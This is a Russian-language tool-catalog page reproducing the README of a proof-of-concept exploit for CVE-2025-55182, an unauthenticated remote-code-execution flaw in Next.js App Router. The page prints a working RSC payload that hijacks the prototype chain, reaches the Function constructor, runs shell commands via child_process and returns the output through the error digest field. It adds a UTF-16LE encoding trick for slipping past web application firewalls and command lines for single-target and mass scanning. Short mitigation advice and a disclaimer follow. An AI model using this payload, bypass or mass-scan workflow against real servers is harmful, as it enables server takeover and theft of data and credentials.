Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Эксплойт-доказательство концепции для CVE-2025-55182, демонстрирующий неаутентифицированное RCE в маршрутизаторе приложений Next.js через внедрение объекта на стороне сервера в React Server Components, с обходом WAF с помощью UTF-16LE. | Kitploit
Инструменты/GitHubGitHub/ceh-aditya-raj/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHub
ceh-aditya-raj/cve-2025-55182

CVE-2025-55182

Эксплойт-доказательство концепции для CVE-2025-55182, демонстрирующий неаутентифицированное RCE в маршрутизаторе приложений Next.js через внедрение объекта на стороне сервера в React Server Components, с обходом WAF с помощью UTF-16LE.

Репозиторий
2189 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 NextRce — CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce — это инструмент для исследования безопасности, демонстрирующий CVE-2025-55182, критическую уязвимость в приложениях Next.js App Router, использующих React Server Components (RSC) и Server Actions.

Эта уязвимость позволяет злоумышленнику достичь неаутентифицированного удаленного выполнения кода (RCE) путем злоупотребления тем, как Next.js обрабатывает ответы Server Actions и разрешает сериализованные полезные нагрузки RSC на сервере.


🛠 Обзор уязвимости

CVE-2025-55182 существует в архитектуре Next.js App Router и может быть классифицирована как проблема инъекции объектов на стороне сервера / злоупотребления цепочкой прототипов, возникающая при обработке запросов multipart/form-data.

Когда Server Action запускается, сервер Next.js доверяет и десериализует структурированный ввод клиента. Отправив специально созданную полезную нагрузку, злоумышленник может манипулировать внутренней логикой разрешения и выполнять произвольные системные команды в среде выполнения Node.js.


📌 Первопричина

Уязвимость возникает из-за следующих комбинированных факторов:

  • Модель доверия Server Actions
    Server Actions принимают структурированные полезные нагрузки от клиента, которые обрабатываются через внутреннюю логику разрешения React Server Components с недостаточной проверкой.

  • Инъекция объектов при разрешении RSC
    Созданные полезные нагрузки могут злоупотреблять цепочками прототипов JavaScript и ссылками на конструкторы, что позволяет выйти за пределы предполагаемой области объектов.

  • Недостаточная санитизация
    Внутренние поля, такие как then, _response и геттеры form-data, недостаточно защищены от вредоносных манипуляций.

  • Обход WAF через кодировку
    Многие Web Application Firewalls ориентируются на UTF-8 или стандартный JSON. Кодирование полезных нагрузок как UTF-16LE позволяет обойти проверку, в то время как сервер Next.js декодирует и обрабатывает их корректно.


🔬 Анализ полезной нагрузки

Эксплойт основан на внедрении специально созданной полезной нагрузки RSC в multipart-запрос.
Упрощенная версия полезной нагрузки показана ниже:

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

🧠 Разбор эксплойта

1. Угон цепочки прототипов

  • "then": "$1:__proto__:then"
  • Это злоупотребляет цепочкой прототипов JavaScript, переопределяя свойство then, что влияет на то, как разрешаются Promise во время обработки React Server Components в среде выполнения Next.js.

2. Побег через конструктор

  • "_formData": { "get": "$1:constructor:constructor" }
  • Это предоставляет доступ к глобальному конструктору Function, позволяя выполнять произвольный JavaScript за пределами предполагаемой песочницы.

3. Удаленное выполнение кода

  • process.mainModule .require('child_process') .execSync('{cmd}')
  • Обращается к внутренним модулям Node.js
  • Синхронно выполняет произвольные команды операционной системы
  • Работает с теми же привилегиями, что и процесс сервера Next.js

4. Эксфильтрация вывода через digest

  • throw Object.assign(new Error('x'), { digest: res });
  • Next.js подавляет подробные сообщения об ошибках, если не присутствует поле digest.
  • Прикрепляя вывод команды, закодированный в Base64, к свойству digest, сервер непреднамеренно возвращает результаты выполнения в HTTP-ответе.

5. Обход WAF (UTF-16LE)

  • Полезная нагрузка может быть закодирована как UTF-16LE и отправлена с заголовком:
  • Content-Type: text/plain; charset=utf-16le
  • Многие движки WAF не декодируют и не проверяют содержимое UTF-16LE, в то время как сервер Next.js декодирует и обрабатывает его корректно, повышая надежность эксплуатации.

💥 Воздействие

Успешная эксплуатация CVE-2025-55182 может привести к:

  • 🔥 Полному удаленному выполнению кода

  • 🗄️ Доступу к конфиденциальным данным и учетным данным

  • 🔗 Горизонтальному перемещению внутри инфраструктуры

  • 📦 Компрометации цепочки поставок

  • 🚨 Полному захвату сервера

  • Серьезность: Критическая

  • Требуется аутентификация: Нет

🛡 Смягчение

Для защиты от CVE-2025-55182:

  • Немедленно обновите Next.js до исправленной версии
  • Отключите неиспользуемые Server Actions
  • Внедрите строгую проверку запросов multipart/form-data
  • Добавьте правила WAF для обнаружения полезных нагрузок, закодированных в UTF-16LE
  • Отслеживайте аномальные заголовки Next-Action и шаблоны запросов

🚀 Использование

Одиночная цель

  • python3 exploit.py -u https://target.com -c "whoami"

Массовое сканирование с обходом WAF

  • python3 exploit.py -l urls.txt -B -t 50

⚠️ Отказ от ответственности

  • Этот проект предоставляется строго для образовательных, исследовательских целей и авторизованного тестирования безопасности.

  • НЕ используйте этот инструмент против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.

  • Автор не несет ответственности за неправомерное использование.

Скачать инструмент